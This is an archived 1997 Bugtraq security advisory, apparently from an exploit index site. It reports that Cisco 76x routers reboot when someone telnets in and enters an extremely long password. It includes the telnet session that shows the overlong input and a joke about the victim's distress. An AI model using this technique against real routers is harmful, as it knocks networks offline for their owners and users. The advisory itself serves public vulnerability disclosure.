Cisco password overflow

Summary
Description:Cisco 76x routers reboot when you telnet to them and feed a very long password.
Author:Laslo Orto <Laslo@CPOL.COM>
Compromise:Reboot the Cisco router
Vulnerable Systems:Cisco 76x series of routers.
Date:11 December 1997
Details


Date: Thu, 11 Dec 1997 01:11:13 -0500
From: Laslo Orto <Laslo@CPOL.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: cisco 76x buffer overflow

I dont know of anybody ever posting anything on this sbuject, so i'll go
ahed. I found a buffer overflow in the cisco 76x
series router. The bug exists only in the 4 users limit software, i couldnt
reproduce it with the unlimited version.
When i reported the bug to cisco i promised them that i'll post this info to
public if they dont fix it withing a week.
It was over a month ago, and i was never notified of any fix so i'm asuming
they didnt make any fix. I also cant find any
mentioning of this bug on their web site by searching for the bug id.
The exploit is prety simple:
telnet cisco762.domain.com
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Enter Password:Enter a
veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here
and watch the prety lights go on as the cisco reboots, or imagine your
victim tearing his hair out.

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]